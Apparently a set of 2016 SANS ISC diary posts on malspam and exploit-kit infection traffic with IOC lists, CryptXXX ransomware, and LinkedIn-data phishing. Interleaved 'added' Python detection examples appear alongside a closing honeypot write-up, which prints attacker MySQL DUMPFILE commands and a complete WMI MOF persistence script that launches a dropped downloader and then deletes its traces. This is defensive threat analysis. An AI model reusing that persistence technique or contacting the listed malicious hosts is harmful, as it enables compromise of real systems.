Shown above:  Traffic caused by clicking on the link from the malspam.

Shown above:  Malware downloaded from the malspam link.

Here's what the HTTP traffic looked like from the infected host:

Shown above:  HTTP traffic from the second infection filtered in Wireshark.

In addition to the HTTP traffic, I saw IRC activity on TCP port 443 from the infected host to a server on ssl.houselannister.top at 

Shown above:  My infected host signing in to the IRC channel.

Shown above:  More IRC activity from my infected Windows host.

Of note, the hostname/username for my infected Windows host in this pcap is a throwaway.  Also, the IP address listed in the IRC channel is not the actual IP address of my infected host.

Alerts from this traffic show a Mikey variant, and this infection apparently added my Windows host to a botnet.

Shown above:  Alerts generated on the second infection from Sguil in Security Onion.

Indicators of compromise (IOC) - first example

Domains used for the initial malware download by the .js file:

  • port 80 - www.owifdsferger.net
  • port 80 - www.dorimelds.at
  • port 80 - www.opaosdfdksdfd.ro
  • port 80 - www.brusasport.com

Post infection traffic that triggered alerts for Andromeda malware:

  • port 80 - secure.adnxs.metalsystems.it - POST /new_and/state.php 

Other HTTP traffic during this infection:

  • port 80 - antoniocaroli.it - GET /prova/sd/Lnoort.exe
  • port 80 - www.antoniocaroli.it - GET /prova/sd/Lnoort.exe
  • port 80 - antoniocaroli.it - GET /prova/sd/romeo.exe
  • port 80 - www.antoniocaroli.it - GET /prova/sd/romeo.exe
  • port 80 - www.amicimusica.ud.it - GET /audio/js.mod
  • port 80 - - GET /js/calc.pack
  • port 80 - statcollector.at - GET /statfiles/pz/ft.so
  • port 2352 - Attempted TCP connection to dop.premiocastelloacaja.com
  • port 80 - goyanok.at - HTTP POST triggered alert for Ursnif variant

Indicators of compromise (IOC) - second example

Traffic to retrieve the initial malware:

  • port 80 - www.grupoc4.top - GET /m.php?id=[name] 
  • NOTE: See the pcap for the URL from 4shared.com hosting the initial malware

Post-infection traffic: 

  • port 80 - www.ruthless.sexy - Callback from the infected host
  • port 80 - lol.devyatinskiy.ru - Callback from the infected host 
  • port 80 - api.devyatinskiy.ru - Callback from the infected host
  • port 80 - - GET /fix.dll
  • port 443 - attempted TCP connections to imestre.cheddarmcmelt.top
  • port 443 - IRC traffic to ssl.houselannister.top
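Matching the two IOC lists above against web proxy logs, and telling the IRC-on-443 callback apart from real TLS, as an added Python example that is not code from this diary. The hosts, ports and request paths come from the IOC lists above; the log lines, client addresses, timestamps and the example.com entry are constructed for the example.

```python
"""Added example (not from the diary): match the IOC lists above against constructed
proxy log lines, and tell a real TLS handshake from cleartext IRC on TCP/443."""
import re

# Hosts, ports and (where the diary gives one) request lines from the IOC lists above.
IOCS = [
    ("www.owifdsferger.net", 80, None),
    ("www.dorimelds.at", 80, None),
    ("secure.adnxs.metalsystems.it", 80, "POST /new_and/state.php"),
    ("antoniocaroli.it", 80, "GET /prova/sd/Lnoort.exe"),
    ("antoniocaroli.it", 80, "GET /prova/sd/romeo.exe"),
    ("dop.premiocastelloacaja.com", 2352, None),
    ("www.grupoc4.top", 80, "GET /m.php"),
    ("lol.devyatinskiy.ru", 80, None),
    ("ssl.houselannister.top", 443, None),
    ("imestre.cheddarmcmelt.top", 443, None),
]

# Constructed proxy log in a simple "timestamp client server:port method path" layout.
# Client addresses, timestamps and the example.com line are made up.
SAMPLE_LOG = """\
2016-06-08T14:02:11 10.0.0.5 www.antoniocaroli.it:80 GET /prova/sd/romeo.exe
2016-06-08T14:02:13 10.0.0.5 secure.adnxs.metalsystems.it:80 POST /new_and/state.php
2016-06-08T14:02:20 10.0.0.5 www.example.com:80 GET /index.html
2016-06-08T14:05:41 10.0.0.7 www.grupoc4.top:80 GET /m.php?id=victim
2016-06-08T14:06:02 10.0.0.7 ssl.houselannister.top:443 CONNECT -
"""

LOG_RE = re.compile(r"^(\S+) (\S+) ([^:\s]+):(\d+) (\S+) (\S+)$")


def match_iocs(log_text, iocs=IOCS):
    """Return (line_no, ioc_host, detail) for every log line that hits an IOC.

    A host matches if it equals the IOC host or is a subdomain of it (the diary lists
    antoniocaroli.it both with and without "www."). When the IOC carries a request
    line, the method and the path (query string ignored) must match as well.
    """
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        _ts, _client, host, port, method, path = m.groups()
        for ioc_host, ioc_port, ioc_req in iocs:
            same_host = host == ioc_host or host.endswith("." + ioc_host)
            if not same_host or int(port) != ioc_port:
                continue
            if ioc_req and f"{method} {path.split('?', 1)[0]}" != ioc_req:
                continue
            hits.append((n, ioc_host, f"{method} {path} -> {host}:{port}"))
    return hits


# First bytes a client sends on a TLS connection: a handshake record (0x16), version 3.x.
# The IRC bot from the second infection talks plain IRC on 443, so its first bytes are
# readable commands instead.
IRC_RE = re.compile(rb"^(NICK|USER|PASS|JOIN|PRIVMSG|PING|PONG|:\S+ \d{3} )")


def classify_443_payload(payload):
    """Return "tls", "irc" or "unknown" for the first bytes seen on a port 443 stream."""
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03:
        return "tls"
    if IRC_RE.match(payload):
        return "irc"
    return "unknown"


if __name__ == "__main__":
    for hit in match_iocs(SAMPLE_LOG):
        print("IOC hit on line %d (%s): %s" % hit)
    print(classify_443_payload(b"\x16\x03\x01\x00\xc5\x01\x00\x00\xc1\x03\x03"))
    print(classify_443_payload(b"NICK [XP|USA|123456]\r\nUSER abc 0 0 :abc\r\n"))
```

The subdomain match is deliberate: the diary saw the same host with and without "www.", and a proxy may log either form. The 443 classifier only looks at the first bytes of a stream, which is enough to separate a TLS ClientHello from a bot that registers its nick in cleartext; anything else is left as "unknown" rather than guessed.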

Final words

Malspam is a pretty low-level threat, in my opinion.  Most people recognize malspam and will never click on the attachments or links.  For those more likely to click, software restriction policies can play a role in preventing infections (a zipped .js attachment only does damage because Windows hands it to the script host; blocking script execution from user-writable folders stops it cold).  And finally, people should be using properly administered Windows hosts and follow best security practices (up-to-date applications, latest OS patches, etc).

The same thing goes for Dridex/Locky malspam, which I expect will return soon enough.

But many vulnerable hosts are still out there, and enough people using those hosts are still tricked by this malspam.  That's probably why malspam remains a profitable method to distribute malware.

Pcaps and malware for this ISC diary can be found here.

Brad Duncan
brad [at] malware-traffic-analysis.net


[1] https://www.proofpoint.com/us/threat-insight/post/Dridex-Actors-Get-In-the-Ransomware-Game-With-Locky
[2] https://twitter.com/MalwareTechBlog/status/738530089600733184


Published: 2016-06-08

Neutrino EK and CryptXXX


By Monday 2016-06-06, the pseudo-Darkleech campaign began using Neutrino exploit kit (EK) to send CryptXXX ransomware [1].  Until then, I'd only seen Angler EK distribute CryptXXX.  However, this is not the first time we've seen campaigns associated with ransomware switch between Angler EK and Neutrino EK [2, 3, 4, 5].  It was documented as early as August 2015 [2].  This can be confusing, especially if you're expecting Angler EK.  Campaigns can (and occasionally do) switch EKs.

For an explanation of EK fundamentals, see this blog post.

On Tuesday 2016-06-07, I found a compromised website with injected script from two different campaigns: pseudo-Darkleech and EITest.  On that day, both campaigns were distributing CryptXXX ransomware.  In today's diary, we examine two examples of Neutrino EK triggered by the same compromised website.  One example starts with pseudo-Darkleech script, and the other starts with EITest script.  Pcaps for today's ISC diary can be found here.

Shown above:  Flow chart for one website compromised by two campaigns.

Of note, I've never seen both infections at the same time.  I've only generated EK traffic from one campaign or the other.  Injected script from the pseudo-Darkleech campaign tends to prevent injected script by other campaigns from running.

Development and spread of CryptXXX

Below is a timeline documenting the development of CryptXXX and its spread from pseudo-Darkleech to other campaigns.  It's not a complete list of everything about CryptXXX, but it provides a general outline.

  • 2016-04-16, Proofpoint reports the first sightings of CryptXXX ransomware [6]
  • 2016-04-23, ISC diary describes pseudo-Darkleech causing Angler EK/Bedep/CryptXXX infections [7]
  • 2016-04-28, PaloAlto Networks reports "Afraidgate" campaign switched from sending Locky to sending CryptXXX [8]
  • 2016-05-09, Proofpoint issues another report on CryptXXX, now at version 2 [9]
  • 2016-05-24, BleepingComputer reports CryptXXX updated to version 3 [10]
  • 2016-06-01, New decryption instructions indicate version 3 of CryptXXX may actually be named "UltraCrypter" [11, 12]
  • 2016-06-03, Proofpoint posts update about CryptXXX, now at version 3.1 [13]
  • 2016-06-05, EITest campaign noted sending CryptXXX through Angler EK [14]

Proofpoint's most recent entry lists the version history of CryptXXX from 1.001 on April 16th to version 3.100 on May 26th.  It also describes some new tricks CryptXXX has up its sleeve.

Infection traffic from Tuesday 2016-06-07

On Tuesday 2016-06-07, I found a website with injected script for both the pseudo-Darkleech campaign and the EITest campaign.

Shown above:  Script from the EITest campaign near the end of the page.

Shown above:  Start of injected script from the pseudo-Darkleech campaign after the page headers.

I was able to generate traffic for each campaign, but I had to use two separate visits, because the pseudo-Darkleech script prevented the EITest script from generating any EK traffic.

Shown above:  Traffic from pseudo-Darkleech Neutrino EK filtered in Wireshark.

Shown above:  Traffic from EITest Neutrino EK filtered in Wireshark.

The Wireshark filter used in the above two images was: http.request or (!(tcp.port eq 80) and tcp.flags eq 0x0002)  In other words: every HTTP request, plus the opening SYN (flags 0x002) of any TCP connection to a port other than 80, which is how the port 443 callback shows up without the bulk of its traffic.

Indicators of compromise (IOCs) from the traffic follow:

  • port 80 - ktljl.g3alead.top - Neutrino EK (pseudo-Darkleech campaign)
  • port 80 - nulesz.tk - EITest flash redirect
  • port 80 - vnogjnbaf.c0ecompare.top - Neutrino EK (EITest campaign)
  • port 80 - zijkhhcsrd.c0ecompare.top - Neutrino EK (EITest campaign)
  • port 443 - CryptXXX callback traffic (custom encoding)

In both cases, Neutrino EK delivered CryptXXX ransomware as a DLL file.  As usual with CryptXXX infections, we saw C:\Windows\System32\rundll32.exe copied to the same folder as the CryptXXX DLL file.  In this case, it was re-named explorer.exe.

Shown above:  The CryptXXX DLL file and rundll32.exe copied and renamed as explorer.exe.
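A host-side check for that renamed rundll32.exe, as an added Python example that is not part of this diary. The file contents are stand-in bytes and the temp-folder paths and the DLL name are made up; on a real host you would hash the actual files and compare them against the hash of the genuine C:\Windows\System32\rundll32.exe.

```python
"""Added example (not from the diary): find a Windows system binary that has been copied
and renamed, the way CryptXXX parks rundll32.exe next to its DLL as "explorer.exe"."""
import hashlib
from pathlib import PureWindowsPath

# Stand-in contents for the binaries; on a live host you would read the real files.
RUNDLL32_BYTES = b"MZ\x90\x00" + b"rundll32 stand-in" * 8
EXPLORER_BYTES = b"MZ\x90\x00" + b"explorer stand-in" * 8
PAYLOAD_DLL_BYTES = b"MZ\x90\x00" + b"cryptxxx stand-in" * 8

# Known-good binaries keyed by their canonical location.
KNOWN_GOOD = {
    r"C:\Windows\System32\rundll32.exe": RUNDLL32_BYTES,
    r"C:\Windows\explorer.exe": EXPLORER_BYTES,
}

# Constructed inventory of (path, contents); the temp folder and the DLL name are made up.
INVENTORY = [
    (r"C:\Windows\System32\rundll32.exe", RUNDLL32_BYTES),
    (r"C:\Windows\explorer.exe", EXPLORER_BYTES),
    (r"C:\Users\victim\AppData\Local\Temp\explorer.exe", RUNDLL32_BYTES),
    (r"C:\Users\victim\AppData\Local\Temp\a1b2c3.dll", PAYLOAD_DLL_BYTES),
]


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def find_masquerades(inventory, known_good=KNOWN_GOOD):
    """Return (path, canonical_path, dlls_in_same_folder) for every file whose contents
    hash to a known system binary but which does not sit at that binary's own path.

    A renamed rundll32 next to a DLL is the CryptXXX layout, so the DLLs sharing the
    folder are reported with it; they are the likely payload.
    """
    by_hash = {sha256(data): PureWindowsPath(p) for p, data in known_good.items()}
    by_dir = {}
    for path, _data in inventory:
        p = PureWindowsPath(path)
        by_dir.setdefault(str(p.parent).lower(), []).append(p)

    findings = []
    for path, data in inventory:
        canonical = by_hash.get(sha256(data))
        if canonical is None:
            continue
        p = PureWindowsPath(path)
        if str(p).lower() == str(canonical).lower():
            continue  # the genuine binary in its genuine place
        dlls = [str(q) for q in by_dir[str(p.parent).lower()] if q.suffix.lower() == ".dll"]
        findings.append((str(p), str(canonical), dlls))
    return findings


if __name__ == "__main__":
    for path, canonical, dlls in find_masquerades(INVENTORY):
        print(f"{path} is really {canonical}; DLLs beside it: {dlls}")
```

The check keys on content, not on name, so it does not matter what the copy is called; a renamed rundll32.exe under a user profile is the signal, and the DLLs beside it are what to pull for analysis.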

The two CryptXXX DLL files from these infections are:

  • 2016-06-07-EITest-Neutrino-EK-payload-CryptXXX.dll (419 kB) - VirusTotal link
    SHA256: d322e664f5c95afbbc1bff3f879228b40b8edd8e908b95a49f2eb87b9038c70b
  • 2016-06-07-pseudoDarkleech-Neutrino-EK-payload-CryptXXX.dll (440 kB) - VirusTotal link
    SHA256: 75a927e636c788b7e54893161a643c258fecbbf47d6e7308d3439091aa3ce534

CryptXXX will have different domains in the decryption instructions depending on the campaign it came from.  In the two images below, you'll find different domains used in instructions from the EITest CryptXXX sample and instructions from the pseudo-Darkleech CryptXXX sample.

Shown above:  Part of the decrypt instructions from the EITest CryptXXX sample.

Shown above:  Part of the decrypt instructions from the pseudo-Darkleech CryptXXX sample.

Although CryptXXX samples from a specific campaign are changed or updated as the day progresses, they will always be different from CryptXXX samples from another campaign during the same timeframe.

Checking the traffic on Security Onion using Suricata and the ETPRO ruleset, I found the usual alerts for Neutrino EK traffic and the CryptXXX callback after the initial infection.

Shown above:  Using tcpreplay on one of the pcaps in Security Onion.

Last month, Neutrino EK was documented using Flash exploits based on CVE-2016-4117 effective against Adobe Flash Player up to version [15].  Post-infection traffic for CryptXXX is similar to what we've seen before.  Overall, we found no real surprises from these infections.  The only interesting fact is the switch (for now) from Angler EK to Neutrino EK to deliver CryptXXX.

Shown above:  Neutrino EK landing page (from the EITest pcap).

Shown above:  Neutrino EK sends Flash exploit (from the EITest pcap).

Shown above:  Neutrino EK sends the CryptXXX malware payload (from the EITest pcap).

Shown above:  CryptXXX callback traffic from one of the infections.

As stated earlier, EmergingThreats has a rule for CryptXXX callback traffic.  Talos also has you covered for CryptXXX in the Snort subscriber ruleset.

Shown above:  Example CryptXXX alerts on this traffic from the Snort subscriber ruleset.

Final words

Traffic patterns for Neutrino EK have remained relatively consistent since it reappeared in November 2014 after a 6-month absence [16].  The only big change?  Neutrino EK now sticks to port 80.  Before October or November of 2015, Neutrino EK almost always used a non-standard port for its HTTP traffic.  Since then, it's consistently used TCP port 80 (like every other EK I currently see).

How can people protect themselves against Neutrino EK?  As always, properly administered Windows hosts that follow best security practices (up-to-date applications, latest OS patches, software restriction policies, etc.) should be protected against this EK threat.

Unfortunately, a large percentage of Windows hosts don't follow best practices, and criminal groups are quick to take advantage.

User awareness is an important part of any defense.  You can't protect yourself from threats you don't understand.  With that in mind, I'll mention again a post on EK fundamentals located here.  It hopefully clears up some misconceptions I've heard over the years about EK activity.

Pcaps and malware for this ISC diary can be found here.

Shown above:  Desktop for one of the Windows hosts when rebooted after a CryptXXX infection.

Brad Duncan
brad [at] malware-traffic-analysis.net


[1] http://malware-traffic-analysis.net/2016/06/06/index.html/
[2] https://isc.sans.edu/forums/diary/Actor+using+Angler+exploit+kit+switched+to+Neutrino/20059/
[3] https://isc.sans.edu/forums/diary/Actor+that+tried+Neutrino+exploit+kit+now+back+to+Angler/20075/
[4] https://isc.sans.edu/forums/diary/Whats+the+situation+this+week+for+Neutrino+and+Angler+EK/20101/
[5] https://isc.sans.edu/forums/diary/EITest+campaign+still+going+strong/21081/
[6] https://www.proofpoint.com/us/threat-insight/post/cryptxxx-new-ransomware-actors-behind-reveton-dropping-angler
[7] https://isc.sans.edu/forums/diary/Angler+Exploit+Kit+Bedep+and+CryptXXX/20981/
[8] http://researchcenter.paloaltonetworks.com/2016/04/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/
[9] https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-strike-back-against-free-decryption-tool
[10] http://www.bleepingcomputer.com/news/security/cryptxxx-updated-to-version-3-0-decryptors-no-longer-work/
[11] http://www.bleepingcomputer.com/news/security/cryptxxx-rebranding-as-ultracrypter/
[12] http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/cryptxxx-gets-overhaul-now-known-as-ultracrypter
[13] https://www.proofpoint.com/us/threat-insight/post/cryptxxx-ransomware-learns-samba-other-new-tricks-with-version3100
[14] http://www.broadanalysis.com/2016/06/05/angler-exploit-kit-via-eitest-gate-sends-cryptxxx-ransomware/
[15] http://malware.dontneedcoffee.com/2016/05/cve-2016-4117-flash-up-to-2100213-and.html
[16] https://isc.sans.edu/forums/diary/Exploit+Kit+Evolution+Neutrino/19283/


Published: 2016-06-07

LinkedIn Breach Data Used For Malicious E-Mails

Yesterday, the German federal CERT (CERT-BUND) warned of phishing e-mails that are made more plausible by using data that appears to originate from the recently leaked LinkedIn data set. The e-mails address the recipient by full name and job title. Typically, the attachments claim to contain an invoice.

Since then, a couple of users have reported receiving e-mails that match the pattern. For example: 

(Thanks to our reader Arjan for the sample)

The e-mails arrive in different languages. They address the recipient by full name, job title and company name, to make the e-mail more plausible.

This is similar to the way social media was used in the past to create more convincing phishing e-mails. For example, see this old article from 3 years ago about how Facebook data was used in this way. With the LinkedIn leak, data has become available that wasn't reachable by simple screen scrapers (or API users) in the past. 

Johannes B. Ullrich, Ph.D.


Published: 2016-06-06

What Time Is It? Using NTP Traffic to Calibrate PCAP Timestamps

This is an issue that came up today when discussing how tcpdump and Wireshark display time stamps. If you have a packet capture file (pcap), it is nice to know that the time stamps are accurate. One way to check accuracy is to use NTP traffic that was captured in the pcap file. 

First, let's limit ourselves to NTP packets coming from a server. The NTP protocol uses different protocol modes. We are going to restrict ourselves to packets coming from NTP servers, which means protocol mode 4 (server). There is a simple Wireshark/tshark filter we can use: 

 ntp.flags.mode == 4

Next, we need to extract the time stamp. In NTP, we will receive 4 different time stamps:

- Reference Timestamp: Time the server's clock was last set or corrected
- Origin Timestamp: Time the request was sent from the client to the server
- Receive Timestamp: Time the request was received by the server
- Transmit Timestamp: Time at the server when the reply left for the client

Among these time stamps, the Transmit Timestamp is the most appropriate: it is the server's clock reading at the moment the reply left, so it is the closest thing to our capture's time stamp for that same packet. We can extract it from tshark using the "-T fields" option:

tshark -r ntp.pcap -n -Y "ntp.flags.mode==4" \
       -T fields -e ntp.xmt -e frame.time

"frame.time" gives us the time stamp from the packet capture.

The output is already pretty close to what we are looking for:

Jun  6, 2016 18:27:26.073666000 EDT    Jun  6, 2016 18:27:26.119514000 EDT
Jun  6, 2016 18:27:27.083747000 EDT    Jun  6, 2016 18:27:27.144937000 EDT
Jun  6, 2016 18:27:28.072173000 EDT    Jun  6, 2016 18:27:28.113482000 EDT
Jun  6, 2016 18:27:29.094674000 EDT    Jun  6, 2016 18:27:29.153425000 EDT

As you can tell, the times look very close. But we can do a bit better. We can convert the times to Unix time stamps and subtract them from each other to get the difference in seconds. A little shell script will help here. This can be done as a one-liner, but for readability, I split it up into several lines. The script assumes that the output of the tshark command above was saved to "/tmp/ntp.txt"; tshark separates the two fields with a tab, which is what the loop splits on, and GNU date is assumed for the "-d" option.

while IFS=$'\t' read -r a b; do
  # $a is ntp.xmt, $b is frame.time; compare them as Unix seconds (GNU date)
  echo "$a - $b DIFF $(( $(date +%s -d "$a") - $(date +%s -d "$b") ))"
done < /tmp/ntp.txt

(There may be a neat, short way to do this with awk... take that as a challenge ;-). Oh, and please DO NOT replace the spaces I used to indent the lines with TABS... just because.)

The final output:

Jun  6, 2016 18:26:26.748699000 EDT - Jun  6, 2016 18:26:26.505266000 EDT DIFF 0
Jun  6, 2016 18:26:46.125142000 EDT - Jun  6, 2016 18:26:45.890823000 EDT DIFF 1
Jun  6, 2016 18:26:46.325736000 EDT - Jun  6, 2016 18:26:46.091757000 EDT DIFF 0
Jun  6, 2016 18:26:46.525703000 EDT - Jun  6, 2016 18:26:46.291742000 EDT DIFF 0
Jun  6, 2016 18:26:48.125179000 EDT - Jun  6, 2016 18:26:47.892105000 EDT DIFF 1
Jun  6, 2016 18:26:48.325629000 EDT - Jun  6, 2016 18:26:48.092543000 EDT DIFF 0

The last number is the difference in whole seconds. It should be 0 or 1 (or -1 if the capture clock runs slightly ahead) if the times are synchronized well: the conversion to Unix time throws away the fractional seconds, so a difference of 1 only means the two times straddle a second boundary.

BTW: the exact syntax may differ a bit depending on your version of tshark. The "date" command also differs between *nix systems. In particular, OS X requires a different syntax (its BSD date parses a date string with "-j -f", not "-d").
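The same comparison carried out with sub-second resolution, as an added Python example that is not part of this diary. It parses the four tshark output lines shown above and drops the timezone abbreviation, since both columns carry the same one and it cancels out.

```python
"""Added example (not from the diary): compute the pcap-vs-NTP clock offset with
sub-second resolution from the tshark output shown above."""
from datetime import datetime

# The four tshark output lines from above (ntp.xmt, a TAB, then frame.time).
TSHARK_OUTPUT = (
    "Jun  6, 2016 18:27:26.073666000 EDT\tJun  6, 2016 18:27:26.119514000 EDT\n"
    "Jun  6, 2016 18:27:27.083747000 EDT\tJun  6, 2016 18:27:27.144937000 EDT\n"
    "Jun  6, 2016 18:27:28.072173000 EDT\tJun  6, 2016 18:27:28.113482000 EDT\n"
    "Jun  6, 2016 18:27:29.094674000 EDT\tJun  6, 2016 18:27:29.153425000 EDT\n"
)


def parse_tshark_time(text):
    """Parse 'Jun  6, 2016 18:27:26.073666000 EDT' into a naive datetime.

    The zone abbreviation is dropped (both columns share it). datetime only keeps
    microseconds, so the nanosecond field is truncated to six digits.
    """
    month, day, year, clock = text.split()[:4]
    hms, frac = clock.split(".")
    return datetime.strptime(
        f"{month} {day.rstrip(',')} {year} {hms}.{frac[:6]}", "%b %d %Y %H:%M:%S.%f"
    )


def clock_offsets(tshark_output):
    """Return frame.time minus ntp.xmt, in seconds, for each line of tshark output."""
    offsets = []
    for line in tshark_output.splitlines():
        if not line.strip():
            continue
        xmt, captured = line.split("\t")
        offsets.append((parse_tshark_time(captured) - parse_tshark_time(xmt)).total_seconds())
    return offsets


def check_sync(tshark_output, tolerance=1.0):
    """Summarise the offsets and say whether the capture clock is within tolerance.

    The offset also contains the one-way delay from the server to the capture point, so
    a small positive value is what a well-synchronised sensor looks like. A negative
    value means the capture clock runs behind the server (a packet cannot be captured
    before it was sent); a large value either way means the pcap times are off.
    """
    offsets = clock_offsets(tshark_output)
    return {
        "samples": len(offsets),
        "min": min(offsets),
        "max": max(offsets),
        "mean": sum(offsets) / len(offsets),
        "in_sync": all(abs(o) < tolerance for o in offsets),
    }


if __name__ == "__main__":
    for o in clock_offsets(TSHARK_OUTPUT):
        print(f"offset {o:+.6f} s")
    print(check_sync(TSHARK_OUTPUT))
```

To run it on your own capture, feed it the output of the tshark command above (tshark writes the two fields tab-separated). For the four lines shown, the capture clock reads 41 to 61 milliseconds after the server's transmit time, which is network delay plus a small offset; a tolerance of one second matches the whole-second check in the shell version.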


Johannes B. Ullrich, Ph.D.


Published: 2016-06-05

What's Going on With libtiff?

"libtiff", as the name implies, is a library used to parse TIFF formatted images. While you don't run into TIFF images on the web every day, the format is quite popular for higher-resolution/high quality applications like printing. TIFF allows the user to select between lossless or lossy compression depending on the preferences of the user.

While the library is very popular, a reader wrote in last week asking whether it is still maintained.

Currently, there are three security issues listed in NIST's vulnerability database. These issues affect the most recent version of libtiff (4.0.6), which was released in September last year.  Popular software such as Google Chrome uses libtiff, and those applications are the path through which these vulnerabilities could be exploited.

This issue isn't unique to libtiff. Important libraries (not just open source, the same problem can come up with commercial software as well...) stop being maintained without notice, and users of these libraries have no idea that new vulnerabilities are no longer patched. 

If you develop software, it is critical that you track the code that you include (again: open source and commercial). There are a number of checks you should perform before adding a library to your repository of "approved third party code":

- is the code still maintained? (e.g. are there known vulnerabilities that remain unpatched?)
- how would you learn about a patch being released? (a mailing list? an advisory feed?)
- is the code's license compatible with your project? (some open source licenses restrict commercial use)

And most important: Have a repository of "approved third party code"! Don't just include libraries without considering alternatives first. Code reuse is great, and developers should take advantage of already written code, but you have to manage the use of third party code.

And finally: What is your exit strategy? I have no idea what to recommend in the libtiff case. Can you do without it? Can you afford to wait (I don't see any exploits ... yet ... publicly...) 


Johannes B. Ullrich, Ph.D.


Published: 2016-06-03

MySQL is YourSQL

It's The End of the World and We Know It

If you listen to the press - those purveyors of doom, those “nattering nabobs of negativism” - you arrive at a single, undeniable conclusion: The world is going to hell in a hand-basket.

They tell us that we’ve become intolerant, selfish, and completely unconcerned with the welfare of our fellow man.

I’m here today to deliver a counterpoint to all of that negativity. I’ve come here to tell you that people are, essentially, GOOD.

You see: I am a database bubblehead.

Over the past few weeks, since I’ve deployed an obviously flawed, horribly insecure, and utterly fictitious “MySQL server,” I have received a veritable flood of free “assistance” in administering that system - provided by strangers from across the Interwebz.  They have - out of the very goodness of their hearts - taken over DBA duties. I’ve only had to sit back and watch...


Very, very carefully...

A Free DBA - And Worth EVERY Penny

There are so many folks interested in the toil and drudgery of DBA duties on my honeypot’s MySQL server, it seems like they’re taking shifts. One will arrive, do a touch of DBA work and then leave… eventually being replaced by another.  The amount of database-related kindness in this world is, in some ways, almost overwhelming.

Let’s take a look at what a typical “shift” for one of my “remote DBAs” looks like:

Arriving at the Office

My newest co-worker - our DBA du jour (who I’ve chosen to call “NoCostRemoteDBADude”) - makes his first appearance at the “office” and immediately logs into the MySQL server as ‘mysql’ with a blank password.

Note to self: Wow. That’s not very secure. I should probably fix that...

We all know how it is when you’re the FNG… you try your best to buckle down and get right to work… you know: impress the boss. NoCostRemoteDBADude does just that:

show variables like "%plugin%";
show variables like 'basedir';
show variables like "%plugin%";
SELECT @@version_compile_os;
show variables like '%version_compile_machine%';
use mysql;

Here, NoCostRemoteDBADude is obviously just trying to get the “lay of the land,” so to speak, and I can’t really say I blame him. After that whole, incredibly disappointing blank password thing, he’s got to be wondering what kind of idiot has been running this box…

I admit it: It was me, and I am a database bubblehead.

Have Toolz, Will Travel...

You can’t expect quality DBA work if you’re not willing to fork over cash for proper tools.

Unfortunately, my tool budget matches my expectation of quality: zero. If, therefore, you’re planning to remote-DBA my honeypot, it’s strictly B.Y.O. as far as tools go. While some folks may balk at the idea of doing DBA work for free AND providing your own tools, oddly, I’ve found no shortage of volunteers.

NoCostRemoteDBADude doesn’t disappoint. He obviously has a preferred suite of tools that he wastes no time installing:

SELECT 0x4D5A90000300000004000000FFFF0000B80000000
0000000000000000000000000000000000000 into DUMPFILE 

Obviously, NoCostRemoteDBADude is a fellow who knows his way around a MySQL database. Here, he’s using a SQL “SELECT” statement to dump a whole bunch of binary data (expressed as a single, long hexadecimal literal) into a file, creating a Windows executable on the server’s disk. “INTO DUMPFILE” writes the value as raw bytes with no escaping, quoting or line terminators, which is exactly what you need for a binary; it requires the FILE privilege, and the MySQL server process must be able to write to the target path.

Although I am, admittedly, a database bubblehead, I know a thing or two about Perl, so I threw together a few lines of code to take the text representation of NoCostRemoteDBADude’s command and spit out a binary file.  Here’s what I found:

The file “ukGMx.exe” is a 36,864 byte long 32-bit Windows PE executable that, if run, immediately downloads hxxp://www.game918.me:2545/host.exe to the file “C:\Windows\shes.exe” and then launches that new executable. It also attempts some sort of weird “self-deleting” thing that, while it works, seems like overkill. Also, in looking over the executable, the old Win32 programmer in me is more than a little disappointed to see them using MFC42.dll. MFC was evil and bloaty from the outset, and it deserved to DIAF long ago. Seeing it included in exploit code is somewhat sad.  I find myself longing for the good ol’ days of being blown away by the coding prowess of the attackers… er… um… “remote-DBAs.”

Remember that I said “if run” in the above description. Right now, NoCostRemoteDBADude has only managed to create the file… he hasn’t managed to run anything. Yet.

Go Ahead And Just “Run” Your Code - I’m Gonna “Prancercize” Mine

Let’s see what else he has up his sleeve:

SELECT 0x23707261676D61206E616D65737061636528225C5
B0A into DUMPFILE 'C:/windows/system32/wbem/mof/buiXDj.mof';

A little Perl magic, and we find that this is actually a rather interesting text file:

#pragma namespace("\\\\.\\root\\cimv2")

class MyClass649
{
        [key] string Name;
};

class ActiveScriptEventConsumer : __EventConsumer
{
        [key] string Name;
        [not_null] string ScriptingEngine;
        string ScriptFileName;
        [template] string ScriptText;
        uint32 KillTimeout;
};

instance of __Win32Provider as $P
{
    Name  = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

instance of __EventConsumerProviderRegistration
{
  Provider = $P;
  ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

Instance of ActiveScriptEventConsumer as $cons
{
  Name = "ASEC";
  ScriptingEngine = "JScript";
  ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"ukGMx.exe\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass649\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

Instance of ActiveScriptEventConsumer as $cons2
{
  Name = "qndASEC";
  ScriptingEngine = "JScript";
  ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\Mxmto.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"ukGMx.exe\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

instance of __EventFilter as $Filt
{
  Name = "instfilt";
  Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass649\"";
  QueryLanguage = "WQL";
};

instance of __EventFilter as $Filt2
{
  Name = "qndfilt";
  Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"ukGMx.exe\"";
  QueryLanguage = "WQL";
};

